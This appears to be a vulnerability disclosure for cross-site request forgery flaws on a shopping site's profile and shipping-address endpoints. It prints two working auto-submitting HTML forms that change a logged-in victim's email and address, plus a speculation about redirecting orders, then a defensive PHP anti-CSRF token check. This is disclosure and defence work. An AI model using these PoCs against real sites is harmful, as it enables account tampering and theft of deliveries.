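2015-06-26: Details reported to the vendor; awaiting vendor handling.
2015-07-01: The vendor has actively ignored the vulnerability; details disclosed to the public.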
PoC (modify profile):
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://www.leyou.com.cn/user/leyou/ManageInfo.php" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="nick" value="jearyxxxx" />
      <input type="hidden" name="email" value="root@jeary.org" />
      <input type="hidden" name="code" value=" " />
      <input type="hidden" name="baby_name" value="test" />
      <input type="hidden" name="gender" value="m" />
      <input type="hidden" name="year" value="2009" />
      <input type="hidden" name="month" value="1" />
      <input type="hidden" name="day" value="1" />
      <input type="hidden" name="sbmtMod" value="¨¨·¨¨?¨¬¨¢½»" />
      <input type="hidden" name="ulogin" value=" " />
      <input type="hidden" name="y" value=" " />
      <input type="hidden" name="m" value=" " />
      <input type="hidden" name="d" value=" " />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

PoC 2 (shipping address):
<html>
  <body>
    <form action="http://www.leyou.com.cn/user/leyou/sub_user_address.php" method="POST">
      <input type="hidden" name="revname" value="test" />
      <input type="hidden" name="addr" value="å“’å“’å“’å“’å“’å“’" />
      <input type="hidden" name="zip" value="000000" />
      <input type="hidden" name="phone" value="13300001111" />
      <input type="hidden" name="zuoji" value="072233332222" />
      <input type="hidden" name="areaid" value="820100" />
      <input type="hidden" name="province" value="香港特区" />
      <input type="hidden" name="city" value="香港岛" />
      <input type="hidden" name="area" value="澳门半岛" />
      <input type="hidden" name="aORu" value="insert" />
      <input type="hidden" name="name" value="name" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
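PS: Setting the default address takes a userid and an aid. If these two values could be obtained, it might be possible to set one's own address as the default, so that orders ship to the maliciously modified address.
Visit the PoC while logged in. The address PoC returns false, but the request succeeds.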
token
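The fix named above is an anti-CSRF token. A sketch of such a check for the two handlers targeted by the PoCs follows, as an added example that is not code from the original report or from the site. The function names, the `csrf_token` field name and the action labels are assumptions, and `$session` and the `$post` arrays are constructed stand-ins for `$_SESSION` and `$_POST`.

```php
<?php
// Added example (hypothetical names; not the site's code).
// Per-session secret; the form token is an HMAC of the form's action label,
// so a token issued for one form is not valid for another.
function csrf_token(array &$session, string $action): string
{
    if (empty($session['csrf_secret'])) {
        $session['csrf_secret'] = random_bytes(32);
    }
    return hash_hmac('sha256', $action, $session['csrf_secret']);
}

// Returns true only when the POST body carries the token for this action.
function csrf_check(array $session, string $action, array $post): bool
{
    $sent = $post['csrf_token'] ?? '';
    if (!is_string($sent) || empty($session['csrf_secret'])) {
        return false; // missing field, array-typed field, or no session secret
    }
    $expected = hash_hmac('sha256', $action, $session['csrf_secret']);
    return hash_equals($expected, $sent); // constant-time comparison
}

// Constructed demo data: $session stands in for $_SESSION, arrays for $_POST.
$session = [];
$profileToken = csrf_token($session, 'ManageInfo');
$addressToken = csrf_token($session, 'sub_user_address');

$cases = [
    // Auto-submitted cross-site form: the browser attaches the session
    // cookie, but the attacker's page cannot read the token.
    'cross-site form, no token' => ['nick' => 'constructed-nick'],
    // Form rendered by the site itself, with the hidden csrf_token field.
    'site form, valid token' => ['nick' => 'constructed-nick', 'csrf_token' => $profileToken],
    // Token issued for the address form replayed against the profile form.
    'token from another form' => ['nick' => 'constructed-nick', 'csrf_token' => $addressToken],
];

foreach ($cases as $label => $post) {
    // A real handler would answer 403 and change nothing when the check fails.
    $ok = csrf_check($session, 'ManageInfo', $post);
    printf("%-28s %s\n", $label, $ok ? 'accepted' : 'rejected');
}
```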
Severity: no impact, ignored by vendor
Ignored at: 2015-07-01 16:12
Vulnerability Rank: 2 (WooYun rating)
None yet